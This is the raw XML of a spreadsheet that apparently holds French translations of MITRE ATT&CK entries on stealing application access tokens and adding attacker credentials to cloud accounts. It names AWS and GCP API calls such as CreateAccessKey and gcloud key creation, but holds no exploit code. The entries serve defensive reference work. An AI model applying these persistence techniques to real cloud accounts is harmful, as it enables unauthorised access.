https://attack.mitre.org/techniques/T1546/014</t>
  </si>
  <si>
    <t>Des adversaires peuvent voler des jetons d'accès aux applications afin d'acquérir des informations d'identification pour accéder à des systèmes et des ressources distants.
Les jetons d'accès aux applications sont utilisés pour effectuer des demandes d'API autorisées au nom d'un utilisateur ou d'un service et sont couramment utilisés comme moyen d'accès aux ressources dans les applications basées sur le cloud et les conteneurs, ainsi que dans les logiciels en tant que service (SaaS).(Citation : Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Les adversaires qui volent des jetons d'API de compte dans les environnements cloud et conteneurisés peuvent être en mesure d'accéder aux données et d'effectuer des actions avec les autorisations de ces comptes, ce qui peut conduire à une escalade des privilèges et à une compromission plus poussée de l'environnement.
Par exemple, dans les environnements Kubernetes, les processus s'exécutant dans un conteneur peuvent communiquer avec le serveur API Kubernetes à l'aide de jetons de compte de service. Si un conteneur est compromis, un adversaire peut être en mesure de voler le jeton du conteneur et d'accéder ainsi aux commandes API de Kubernetes.(Citation : Comptes de service Kubernetes) De même, les instances au sein des pipelines de développement continu/intégration continue (CI/CD) utiliseront souvent des jetons API pour s'authentifier auprès d'autres services à des fins de test et de déploiement. (Citation : Cider Security Top 10 CICD Security Risks) Si ces pipelines sont compromis, des adversaires peuvent être en mesure de voler ces jetons et de tirer parti de leurs privilèges.
Le vol de jetons peut également se produire par le biais de l'ingénierie sociale, auquel cas une action de l'utilisateur peut être nécessaire pour accorder l'accès. OAuth est un cadre couramment mis en œuvre qui délivre des jetons aux utilisateurs pour l'accès aux systèmes. Une application souhaitant accéder à des services en nuage ou à des API protégées peut obtenir l'accès à l'aide d'OAuth 2.0 par le biais d'une variété de protocoles d'autorisation. Un exemple de séquence couramment utilisée est le flux d'octroi de code d'autorisation de Microsoft.(Citation : Microsoft Identity Platform Protocols May 2019)(Citation : Microsoft - OAuth Code Authorization flow - June 2019) Un jeton d'accès OAuth permet à une application tierce d'interagir avec des ressources contenant des données d'utilisateur de la manière demandée par l'application sans obtenir les informations d'identification de l'utilisateur.
Les adversaires peuvent tirer parti de l'autorisation OAuth en construisant une application malveillante conçue pour se voir accorder l'accès aux ressources avec le jeton OAuth de l'utilisateur cible.(Citation : Amnesty OAuth Phishing Attacks, August 2019)(Citation : Trend Micro Pawn Storm OAuth 2017) L'adversaire devra terminer l'enregistrement de son application auprès du serveur d'autorisation, par exemple Microsoft Identity Platform à l'aide d'Azure Portal, de l'IDE Visual Studio, de l'interface en ligne de commande, de PowerShell ou d'appels d'API REST. (Citation : Microsoft - Azure AD App Registration - May 2019) Ensuite, ils peuvent envoyer un [Spearphishing Link] (https://attack.mitre.org/techniques/T1566/002) à l'utilisateur cible pour l'inciter à accorder l'accès à l'application. Une fois le jeton d'accès OAuth accordé, l'application peut obtenir un accès potentiellement à long terme aux fonctionnalités du compte utilisateur par le biais du [jeton d'accès à l'application](https://attack.mitre.org/techniques/T1550/001).(Citation : Microsoft - Azure AD Identity Tokens - Aug 2019)
Les jetons d'accès aux applications peuvent fonctionner avec une durée de vie limitée, ce qui limite la durée pendant laquelle un adversaire peut utiliser le jeton volé. Cependant, dans certains cas, les adversaires peuvent également voler des jetons de rafraîchissement d'application(Citation : Auth0 Understanding Refresh Tokens), ce qui leur permet d'obtenir de nouveaux jetons d'accès sans demander l'avis de l'utilisateur.
https://attack.mitre.org/techniques/T1528"</t>
  </si>
  <si>
    <t>Les adversaires peuvent ajouter des informations d'identification contrôlées par l'adversaire à un compte cloud pour maintenir un accès permanent aux comptes et instances de la victime dans l'environnement.
Par exemple, les adversaires peuvent ajouter des informations d'identification pour les principaux services et les applications en plus des informations d'identification légitimes existantes dans Azure / Entra ID.(Citation : Microsoft SolarWinds Customer Guidance)(Citation : Blue Cloud of Death)(Citation : Blue Cloud of Death Video) Ces informations d'identification comprennent à la fois des clés x509 et des mots de passe. (Citation : Microsoft SolarWinds Customer Guidance) Avec des autorisations suffisantes, il existe plusieurs façons d'ajouter des informations d'identification, notamment via le portail Azure, l'interface de ligne de commande Azure et les modules Azure ou Azure PowerShell (Citation : Demystifying Azure AD Service Principals).
Dans les environnements d'infrastructure en tant que service (IaaS), après avoir obtenu un accès via [Cloud Accounts] (https://attack.mitre.org/techniques/T1078/004), les adversaires peuvent générer ou importer leurs propres clés SSH à l'aide de l'API CreateKeyPai ou &lt;code&gt;ImportKeyPair&lt;/code&gt; dans AWS ou de la commande gcloud compute os-login ssh-keys add dans GCP. (Citation : GCP SSH Key Add) Cela permet un accès permanent aux instances dans l'environnement cloud sans utilisation ultérieure des comptes cloud compromis.(Citation : Expel IO Evil in AWS)(Citation : Expel Behind the Scenes).
Les adversaires peuvent également utiliser l'API CreateAccessKey dans AWS ou la commande gcloud iam service-accounts keys create dans GCP pour ajouter des clés d'accès à un compte. Ils peuvent également utiliser l'API CreateLoginProfile dans AWS pour ajouter un mot de passe qui peut être utilisé pour se connecter à la console de gestion AWS pour [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation : Permiso Scattered Spider 2023)(Citation : Lacework AI Resource Hijacking 2024) Si le compte cible a des autorisations différentes de celles du compte demandeur, l'adversaire peut également être en mesure d'escalader ses privilèges dans l'environnement (c.-à-d. [Cloud Accounts](https://attack.mitre.org/techniques/T1538)). e. (Citation : Rhino Security Labs AWS Privilege Escalation) (Citation : Sysdig ScarletEel 2.0) Par exemple, dans les environnements Entra ID, un adversaire ayant le rôle d'administrateur d'application peut ajouter un nouvel ensemble d'informations d'identification au principal de service de son application. Ce faisant, l'adversaire serait en mesure d'accéder aux rôles et autorisations du principal de service, qui peuvent être différents de ceux de l'administrateur de l'application (Citation : SpecterOps Azure Privilege Escalation).
Dans les environnements AWS, les adversaires disposant des autorisations appropriées peuvent également utiliser l'appel API `sts:GetFederationToken` pour créer un ensemble temporaire d'informations d'identification pour [Forge Web Credentials] (https://attack.mitre.org/techniques/T1606) liées aux autorisations du compte d'utilisateur d'origine. Ces identifiants temporaires peuvent rester valides pendant toute leur durée de vie, même si les identifiants API du compte d'origine sont désactivés.
(Citation : Crowdstrike AWS User Federation Persistence)
Dans les environnements Entra ID avec la fonction de mot de passe d'application activée, les adversaires peuvent être en mesure d'ajouter un mot de passe d'application à un compte d'utilisateur. (Citation : Mandiant APT42 Operations 2024) Comme les mots de passe d'application sont destinés à être utilisés avec des appareils anciens qui ne prennent pas en charge l'authentification multifactorielle (MFA), l'ajout d'un mot de passe d'application peut permettre à un adversaire de contourner les exigences de MFA. En outre, les mots de passe d'application peuvent rester valides même si le mot de passe principal de l'utilisateur est réinitialisé.(Citation : Microsoft Entra ID App Passwords)
https://attack.mitre.org/techniques/T1098/001"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</si>
</sst>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0"/>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0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="8">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theme="4"/>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1" defaultTableStyle="TableStyleMedium9" defaultPivotStyle="PivotStyleLight16">
    <tableStyle name="Style de tableau 1" pivot="0" count="0" xr9:uid="{7BFF6249-B87D-4831-86DB-7C6070BE08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B00483-E3F9-4C14-B125-41886D9D0F23}" name="Tableau1" displayName="Tableau1" ref="A1:E1048576" totalsRowShown="0">
  <autoFilter ref="A1:E1048576" xr:uid="{32B00483-E3F9-4C14-B125-41886D9D0F23}"/>
  <tableColumns count="5">
    <tableColumn id="1" xr3:uid="{EAB65DE4-E96C-4DC4-BA6C-A593AAD4C4DF}" name="ref_id"/>
    <tableColumn id="2" xr3:uid="{5B2E25D5-055C-4CC2-BE38-92B7E2F2AAF5}" name="name" dataDxfId="7"/>
    <tableColumn id="3" xr3:uid="{5152A5DB-181A-4CBA-ACD0-0DD1623FBF9A}" name="description" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{A9C1AFAB-FD44-4CA8-AF8F-85DDC92A390C}" name="name[fr]" dataDxfId="5">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau1[[#This Row],[name]],"en","fr")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="5" xr3:uid="{703428ED-D747-42EA-B555-22555B939ABD}" name="description[fr]" dataDxfId="4">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau1[[#This Row],[description]],"en","fr")</calculatedColumnFormula>
    </tableColumn>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48F8BA-F2F9-4976-90F0-1D6F9F26191B}" name="Tableau3" displayName="Tableau3" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="3">
  <autoFilter ref="A1:G1048576" xr:uid="{4748F8BA-F2F9-4976-90F0-1D6F9F26191B}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{24C825FC-EA07-41BC-98C9-F8FBC3F7C900}" name="ref_id"/>
    <tableColumn id="2" xr3:uid="{C2957CD0-1567-4E27-B892-80D163BFF61A}" name="name"/>
    <tableColumn id="3" xr3:uid="{3FB0D0A9-3BBE-484F-9C46-708CE2F2CA5E}" name="csf_function"/>
    <tableColumn id="4" xr3:uid="{5AF2AF1F-0C38-4C5C-8E23-C5BF504D29EF}" name="category"/>
    <tableColumn id="5" xr3:uid="{A614F9DD-DFFB-4E2A-8855-C1B6CAC4AC07}" name="description" dataDxfId="2"/>
    <tableColumn id="6" xr3:uid="{43428143-7159-4078-8828-576BEE7EB98C}" name="name[fr]" dataDxfId="1">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau3[[#This Row],[name]],"en","fr")</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="7" xr3:uid="{3945B03E-A691-4073-A992-CF72F3A11A34}" name="description[fr]" dataDxfId="0">
      <calculatedColumnFormula>_xlfn.TRANSLATE(Tableau3[[#This Row],[description]],"en","fr")</calculatedColumnFormula>
    </tableColumn>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19" sqref="B19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="13.44140625" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="189.21875" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>2</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>4</v>
      </c>
      <c r="B3" s="4">
        <v>3</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>7</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>9</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>11</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="8" spans="1:2" ht="158.4" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>12</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>14</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>16</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>2103</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>2106</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>2104</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>2106</v>
      </c>
    </row>
    <row r="13" spans="1:2" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>2105</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>2107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baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="33" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>19</v>
      </c>
      <c r="B2" t="s">
        <v>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57"/>
  <sheetViews>
    <sheetView tabSelected="1" topLeftCell="D404" zoomScale="59" zoomScaleNormal="55" workbookViewId="0">
      <selection activeCell="E406" sqref="E406"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.88671875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="13.109375" customWidth="1"/>
    <col min="2" max="2" width="20" style="2" customWidth="1"/>
    <col min="3" max="3" width="255.77734375" style="2" customWidth="1"/>
    <col min="4" max="4" width="20" style="2" customWidth="1"/>
    <col min="5" max="5" width="255.77734375" style="2" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" ht="15.6" x14ac:dyDescent="0.3">
      <c r="A1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>9</v>
      </c>
      <c r="C1" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D1" s="3" t="s">
        <v>2103</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>2104</v>
      </c>
    </row>
    <row r="2" spans="1:5" ht="244.8" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>21</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>22</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>23</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>2108</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>2717</v>
      </c>
    </row>
    <row r="3" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>24</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>26</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>2109</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>2718</v>
      </c>
    </row>
    <row r="4" spans="1:5" ht="144" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>27</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>28</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>29</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>2677</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>2719</v>
      </c>
    </row>
    <row r="5" spans="1:5" ht="144" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>30</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>31</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>32</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>2110</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>2720</v>
      </c>
    </row>
    <row r="6" spans="1:5" ht="144" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>33</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>34</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>35</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>34</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>2721</v>
      </c>
    </row>
    <row r="7" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>36</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>37</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>38</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>2111</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>2722</v>
      </c>
    </row>
    <row r="8" spans="1:5" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>39</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>40</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>41</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>2112</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>2723</v>
      </c>
    </row>
    <row r="9" spans="1:5" ht="216" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>42</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>43</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>44</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>2113</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>2724</v>
      </c>
    </row>
    <row r="10" spans="1:5" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>45</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>46</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>47</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>2114</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>2725</v>
      </c>
    </row>
    <row r="11" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>48</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>49</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>50</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>2115</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>2726</v>
      </c>
    </row>
    <row r="12" spans="1:5" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>51</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>52</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>53</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>2116</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>2727</v>
      </c>
    </row>
    <row r="13" spans="1:5" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>54</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>55</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>56</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>2117</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>2728</v>
      </c>
    </row>
    <row r="14" spans="1:5" ht="244.8" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>57</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>59</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>58</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>2729</v>
      </c>
    </row>
    <row r="15" spans="1:5" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>60</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>61</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>62</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>2730</v>
      </c>
    </row>
    <row r="16" spans="1:5" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>63</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>64</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>65</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>2119</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>2731</v>
      </c>
    </row>
    <row r="17" spans="1:5" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>66</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>67</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>68</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>2120</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>2732</v>
      </c>
    </row>
    <row r="18" spans="1:5" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>69</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>70</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>71</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>2121</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>2733</v>
      </c>
    </row>
    <row r="19" spans="1:5" ht="144" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>72</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>73</v>
      </c>
      <c r="C19" s="2" t="s">
        <v>74</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>2122</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>2734</v>
      </c>
    </row>
    <row r="20" spans="1:5" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>75</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>76</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>77</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>2123</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>2735</v>
      </c>
    </row>
    <row r="21" spans="1:5" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>78</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>79</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>80</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>2124</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>2736</v>
      </c>
    </row>
    <row r="22" spans="1:5" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>81</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>82</v>
      </c>
      <c r="C22" s="2" t="s">
        <v>83</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>2125</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>2737</v>
      </c>
    </row>
    <row r="23" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>84</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>85</v>
      </c>
      <c r="C23" s="2" t="s">
        <v>86</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>2126</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>2738</v>
      </c>
    </row>
    <row r="24" spans="1:5" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>87</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>88</v>
      </c>
      <c r="C24" s="2" t="s">
        <v>89</v>
      </c>
      <c r="D24" s="2" t="s">
        <v>2127</v>
      </c>
      <c r="E24" s="2" t="s">
        <v>2739</v>
      </c>
    </row>
    <row r="25" spans="1:5" ht="158.4" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>90</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>91</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>92</v>
      </c>
      <c r="D25" s="2" t="s">
        <v>2128</v>
      </c>
      <c r="E25" s="2" t="s">
        <v>2740</v>
      </c>
    </row>
    <row r="26" spans="1:5" ht="388.8" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>93</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>94</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>95</v>
      </c>
      <c r="D26" s="2" t="s">
        <v>2129</v>
      </c>
      <c r="E26" s="2" t="s">
        <v>2741</v>
      </c>
    </row>
    <row r="27" spans="1:5" ht="144" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>96</v>
      </c>
      <c r="B27" s="2" t="s">
        <v>97</v>
      </c>
      <c r="C27" s="2" t="s">
        <v>98</v>
      </c>
      <c r="D27" s="2" t="s">
        <v>97</v>
      </c>
      <c r="E27" s="2" t="s">
        <v>2742</v>
      </c>
    </row>
    <row r="28" spans="1:5" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>99</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>100</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>101</v>
      </c>
      <c r="D28" s="2" t="s">
        <v>2130</v>
      </c>
      <c r="E28" s="2" t="s">
        <v>2743</v>
      </c>
    </row>
    <row r="29" spans="1:5" ht="72" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>102</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>103</v>
      </c>
      <c r="C29" s="2" t="s">
        <v>104</v>
      </c>
      <c r="D29" s="2" t="s">
        <v>2131</v>
      </c>
      <c r="E29" s="2" t="s">
        <v>2744</v>
      </c>
    </row>
    <row r="30" spans="1:5" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>105</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>106</v>
      </c>
      <c r="C30" s="2" t="s">
        <v>107</v>
      </c>
      <c r="D30" s="2" t="s">
        <v>2132</v>
      </c>
      <c r="E30" s="2" t="s">
        <v>2745</v>
      </c>
    </row>
    <row r="31" spans="1:5" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>108</v>
      </c>
      <c r="B31" s="2" t="s">
        <v>109</v>
      </c>
      <c r="C31" s="2" t="s">
        <v>110</v>
      </c>
      <c r="D31" s="2" t="s">
        <v>2133</v>
      </c>
      <c r="E31" s="2" t="s">
        <v>2746</v>
      </c>
    </row>
    <row r="32" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>111</v>
      </c>
      <c r="B32" s="2" t="s">
        <v>112</v>
      </c>
      <c r="C32" s="2" t="s">
        <v>113</v>
      </c>
      <c r="D32" s="2" t="s">
        <v>2134</v>
      </c>
      <c r="E32" s="2" t="s">
        <v>2747</v>
      </c>
    </row>
    <row r="33" spans="1:5" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>114</v>
      </c>
      <c r="B33" s="2" t="s">
        <v>115</v>
      </c>
      <c r="C33" s="2" t="s">
        <v>116</v>
      </c>
      <c r="D33" s="2" t="s">
        <v>2135</v>
      </c>
      <c r="E33" s="2" t="s">
        <v>2748</v>
      </c>
    </row>
    <row r="34" spans="1:5" ht="201.6" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>117</v>
      </c>
      <c r="B34" s="2" t="s">
        <v>118</v>
      </c>
      <c r="C34" s="2" t="s">
        <v>119</v>
      </c>
      <c r="D34" s="2" t="s">
        <v>2136</v>
      </c>
      <c r="E34" s="2" t="s">
        <v>2749</v>
      </c>
    </row>
    <row r="35" spans="1:5" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>120</v>
      </c>
      <c r="B35" s="2" t="s">
        <v>121</v>
      </c>
      <c r="C35" s="2" t="s">
        <v>122</v>
      </c>
      <c r="D35" s="2" t="s">
        <v>121</v>
      </c>
      <c r="E35" s="2" t="s">
        <v>2750</v>
      </c>
    </row>
    <row r="36" spans="1:5" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>123</v>
      </c>
      <c r="B36" s="2" t="s">
        <v>124</v>
      </c>
      <c r="C36" s="2" t="s">
        <v>125</v>
      </c>
      <c r="D36" s="2" t="s">
        <v>2137</v>
      </c>
      <c r="E36" s="2" t="s">
        <v>2751</v>
      </c>
    </row>
    <row r="37" spans="1:5" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>126</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>127</v>
      </c>
      <c r="C37" s="2" t="s">
        <v>128</v>
      </c>
      <c r="D37" s="2" t="s">
        <v>2138</v>
      </c>
      <c r="E37" s="2" t="s">
        <v>2752</v>
      </c>
    </row>
    <row r="38" spans="1:5" ht="187.2" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>129</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>130</v>
      </c>
      <c r="C38" s="2" t="s">
        <v>131</v>
      </c>
      <c r="D38" s="2" t="s">
        <v>2139</v>
      </c>
      <c r="E38" s="2" t="s">
        <v>2753</v>
      </c>
    </row>
    <row r="39" spans="1:5" ht="216" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>132</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>133</v>
      </c>
      <c r="C39" s="2" t="s">
        <v>134</v>
      </c>
      <c r="D39" s="2" t="s">
        <v>2140</v>
      </c>
      <c r="E39" s="2" t="s">
        <v>2754</v>
      </c>
    </row>
    <row r="40" spans="1:5" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>135</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>136</v>
      </c>
      <c r="C40" s="2" t="s">
        <v>137</v>
      </c>
      <c r="D40" s="2" t="s">
        <v>2141</v>
      </c>
